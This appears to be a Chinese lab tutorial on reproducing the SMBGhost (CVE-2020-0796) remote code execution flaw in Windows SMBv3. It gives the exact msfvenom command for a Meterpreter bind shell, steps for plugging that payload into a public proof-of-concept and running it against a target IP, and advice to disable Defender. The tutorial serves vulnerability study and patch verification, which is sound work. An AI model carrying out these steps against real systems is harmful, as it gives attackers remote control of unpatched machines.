CVE-2020-0796漏洞該怎么進(jìn)行復(fù)現(xiàn)

本篇文章給大家分享的是有關(guān)CVE-2020-0796漏洞該怎么進(jìn)行復(fù)現(xiàn)，小編覺得挺實(shí)用的，因此分享給大家學(xué)習(xí)，希望大家閱讀完這篇文章后可以有所收獲，話不多說，跟著小編一起來看看吧。

一、漏洞介紹

Microsoft服務(wù)器消息塊（SMB）協(xié)議是Microsoft Windows中使用的一項(xiàng)Microsoft網(wǎng)絡(luò)文件共享協(xié)議。在大部分windows系統(tǒng)中都是默認(rèn)開啟的，用于在計(jì)算機(jī)間共享文件、打印機(jī)等。Windows 10和Windows Server 2016引入了SMB 3.1.1 。本次漏洞源于SMBv3沒有正確處理壓縮的數(shù)據(jù)包，在解壓數(shù)據(jù)包的時(shí)候使用客戶端傳過來的長(zhǎng)度進(jìn)行解壓時(shí)，并沒有檢查長(zhǎng)度是否合法，最終導(dǎo)致整數(shù)溢出。利用該漏洞，黑客可直接遠(yuǎn)程攻擊SMB服務(wù)端遠(yuǎn)程執(zhí)行任意惡意代碼，亦可通過構(gòu)建惡意SMB服務(wù)端誘導(dǎo)客戶端連接從而大規(guī)模攻擊客戶端。

影響范圍：

Windows 10 Version 1903 for 32-bit SystemsWindows 10 Version 1903 for x64-based SystemsWindows 10 Version 1903 for ARM64-based SystemsWindows Server, Version 1903 (Server Core installation)Windows 10 Version 1909 for 32-bit SystemsWindows 10 Version 1909 for x64-based SystemsWindows 10 Version 1909 for ARM64-based SystemsWindows Server, Version 1909 (Server Core installation)

二、漏洞復(fù)現(xiàn)

環(huán)境準(zhǔn)備：

Kali系統(tǒng) ip：172.16.0.27
被攻擊機(jī)win10系統(tǒng)ip：172.16.0.29受此次漏洞影響的win10系統(tǒng)，并安裝帶python3.6.x，我這邊用的是（復(fù)制下方鏈接可下載）ed2k://|file|cn_windows_10_business_editions_version_1903_updated_sept_2019_x64_dvd_2f5281e1.iso|5231140864|B1D5C水4C印401036B0B1EBA64476A95F338|/      （去掉其中的水印二字）

ps：關(guān)閉defender防火墻

復(fù)現(xiàn)步驟：

1、查看環(huán)境情況Windows版本，按win+r,在彈出窗口中輸入

查看版本信息

2、使用工具檢測(cè)靶機(jī)是否存在漏洞，檢測(cè)工具下載地址https://github.com/ollypwn/SMBGhost運(yùn)行結(jié)果如下圖，證明靶機(jī)存在此漏洞

3、kali使用msf生成木馬,并查看是否生成功msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=4444 -b '\x00' -i 1 -f python>exploit

4、下載poc，將生成的exploit.py 生成的code，替換到exploit.py的USER_PAYLOAD參數(shù)，并把參數(shù)buf改為USER_PAYLOAD。

5、運(yùn)行poc：python3.6 exploit.py -ip xx.xx.xx.xx （如果出現(xiàn)報(bào)錯(cuò)physical read primitive failed! 多運(yùn)行幾次）

6、啟動(dòng)msf監(jiān)聽本地端口，獲得靶機(jī)權(quán)限，攻擊成功（run失敗就多run幾次）

以上就是CVE-2020-0796漏洞該怎么進(jìn)行復(fù)現(xiàn)，小編相信有部分知識(shí)點(diǎn)可能是我們?nèi)粘９ぷ鲿?huì)見到或用到的。希望你能通過這篇文章學(xué)到更多知識(shí)。更多詳情敬請(qǐng)關(guān)注億速云行業(yè)資訊頻道。